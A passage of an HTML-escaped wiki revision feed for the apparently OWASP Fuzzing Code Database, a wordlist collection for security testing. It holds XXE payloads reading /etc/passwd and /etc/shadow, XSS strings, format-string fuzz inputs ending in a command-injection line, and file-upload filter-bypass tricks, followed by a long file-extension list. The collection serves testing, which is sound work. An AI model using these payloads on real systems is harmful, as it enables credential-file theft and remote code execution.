&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80065</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80065"/>
				<updated>2010-03-17T20:43:44Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 - notes ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htacces in an upload folder on Apache httpd, try setting .jpg to executable&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename &amp;lt;pre&amp;gt;Appends  (Update: 17 March 2009  ===&lt;br /&gt;
# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename  Appends  (Update: 17 March 2009  ===&lt;br /&gt;
#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009 &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&amp;lt;pre&amp;gt;{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863) ===&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
